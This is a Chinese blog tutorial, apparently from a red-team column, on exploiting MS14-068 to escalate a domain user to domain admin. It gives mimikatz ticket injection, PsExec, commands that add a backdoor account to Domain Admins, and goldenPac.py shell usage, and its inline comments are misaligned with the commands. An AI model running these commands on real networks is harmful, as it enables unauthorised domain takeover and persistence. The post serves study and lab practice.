MS14-068漏洞进行提权

已于 2022-03-01 14:22:34 修改
阅读量1.7k 收藏 3
点赞数
分类专栏: 内网 # 红队技巧 文章标签: 安全
于 2022-02-24 22:25:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123122270
版权

参考:https://blog.csdn.net/qq_37683287/article/details/120450044

域普通用户提权到域控权限

server2008有效 MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

第一步:利用MS14-068伪造生成TGT
在这里插入图片描述

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书

kerberos::ptc TGT_test@moonsec.fbi.ccache

在这里插入图片描述

第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操
作。

PsExec.exe \\dc cmd.exe // 添加test用户
net user test abc123! /add /domain // 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain // 查看域管理员net group "domain admins" /domain

或者使用

python3 goldenPac.py -dc-ip 192.168.0.142 -target-ip 192.168.0.142 moonsec.fbi/test:123456@08server-dc.moonsec.fbi

在这里插入图片描述

GoldenPac
goldenPac.py 是一个用于对 Kerberos 协议进行测试的工具,它集成在 impacket 工具包里。

Kali 在使用之前需要先安装 Kerberos 客户端

apt-get install krb5-user -y

利用 goldenPac.py 获取 Shell

python3 goldenPac.py 0day.org/jack:Aa123456@OWA2010SP3.0day.org

这里使用 IP 进行连接会连接不成功,只能使用主机名,因此可以在 hosts 文件中添加主机名对应的 IP

goldenPac.py 是通过 PsExec 获得 Shell 的,因此会产生大量的日志,而且现在这种连接方式也已经被各大杀软所拦截。

明月清风~~
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
域渗透之MS14-068(CVE-2014-6324)
谢公子的博客
06-24 6169
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器限。如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务器限。 MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测。 systeminfo |find "3011780" 如下,为空说明该服务...
AD域渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2576
漏洞编号MS14-068的漏洞,将允许任意用户升到域管理员的限,补丁编号则是KB3011780 原理分析 ​ 在之前到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC限验证机制产生漏洞的原因是
ms14-068域控
技术超强的网络安全平台
09-15 706
msf ms14-068 域控 上传ms14-068.exe到目标主机的目录上 upload /root/wwwhack23/ms14-068.exe C:/phpstudy_pro/www/www/www.webhack123.com/ms14-068.exe 这些信息从metasploit 前期信息来的,可以翻到上面查看 ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.1
漏洞(Privilege Escalation Vulnerability)
最新发布
qq_69100706的博客
04-20 456
漏洞(Privilege Escalation Vulnerability)是指在一个系统或应用程序中,攻击者能够通过某种方式获得比原本更低级别限更高的系统或应用程序访问限。这种漏洞通常存在于操作系统、应用程序或网络服务中,攻击者利用这类漏洞可以突破原有的限限制,执行未经授的操作,如读取、修改或删除关键系统文件,操控系统服务,甚至取得系统管理员限。
MS14-068域漏洞复现
WY92139010的博客
05-14 534
MS14-068域漏洞复现 一、漏洞说明 改漏洞可能允许攻击者将未经授的域用户账户的限,到域管理员的限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二、漏洞原理 Kerberos认证原理:ht...
MS14_068域漏洞复现
ninnjnjn的博客
04-02 713
MS14_068域漏洞复现 1.漏洞说明 该漏洞可能允许攻击者将未授的域用户账户的限,到域管理员的限 2.漏洞原理 3.漏洞利用前 (1)域控主机没有打MS14_068的补丁 (2)攻击者拿下了一台域内主机的普通计算机,并获得普通域用户名以及密码/hash值,和用户的suid 4.实验环境 域控主机windows 2008R2 192.168.164.55 域内主机windows ...
MS14-058-x64.exe
07-23
MS14-058漏洞(CVE-2014-4113)_ms14058
MS10-048 windows本地 32位、64位EXP
03-04
MS10-048】安全更新是微软在2010年发布的一个关键补丁,用于修复Windows操作系统中的一个严重漏洞。该漏洞主要涉及Windows的Kernel-Mode驱动程序,特别是与字体解析相关的组件。当系统处理特制的TrueType字体文件...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
12-29
ms10-046漏洞,也被称为“LNK本地漏洞”,是2010年发现的一个严重安全漏洞。这个漏洞主要影响Windows操作系统,尤其是Windows XP和Windows 7。当用户打开恶意创建的快捷方式图标(.lnk文件)时,攻击者可以利用...
windows server 2003 系统
08-09
对Windows Server2003操作系统MS08_067、MS03_026漏洞进行渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好; 渗透和验证过程必要有截图和文字说明; 其余部分均可配文字简介...
第60天:-MY&MS&ORA等SQL数据库1
08-03
本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行,以及涉及的相关知识点。 首先,我们要明白数据库的基本前:服务器上必须运行着数据库服务,并且攻击者需要掌握最高限用户的密码。对于非Access...
MS14-068域渗透
bailandawang123的博客
03-10 435
ms14068主要是通过伪造域管的tgt,将普通用户升为域管用户,从而控制域控。
内网安全 - 域横向 PTH&PTK&PTT
acepanhuan的博客
03-16 372
内网安全 - 域横向 PTH&PTK&PTT
ms14-068的深入分析
zz_strive_2012的专栏
06-17 5080
0×0 背景 初次认识该漏洞是在FreeBuf上对该漏洞的预警《漏洞预警:系统漏洞(CVE-2014-6324)影响全版本Windows服务器》: 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-
ATT&CK靶场系列(四)
qq_1873822的博客
11-30 3935
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 拓扑结构
内网安全-常见横向移动总结
weixin_45701675的博客
04-25 5624
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的限失效。
史上最强内网渗透知识点总结
热门推荐
3569
06-02 3万+
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...
升】windows平台-项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2345
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
MS14-068漏洞复现
网络安全。
02-01 5161
0x01 简介 MS14-068漏洞可将普通域用户升为域管理员用户,这个漏洞实战是碰到的可能性非常小了,但是如此经典的漏洞,不去玩一下,真的很不爽,于是搭建环境,复现一波。 0x02 漏洞复现 方法1:MS14-068工具利用 (https://github.com/ianxtianxt/MS14-068) 最开始想用一台win 2003作为域内机器攻击域控,可工具在03上各种问题,于是换了...
ms09-012 PR和烤肉的原理
05-26
ms09-012和烤肉都是利用了Windows内核的漏洞进行的。具体原理如下: ms09-012漏洞:该漏洞存在于Windows内核中的NDISTAPI驱动程序中,攻击者可以通过构造特定的参数进行攻击,从而获取SYSTEM限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值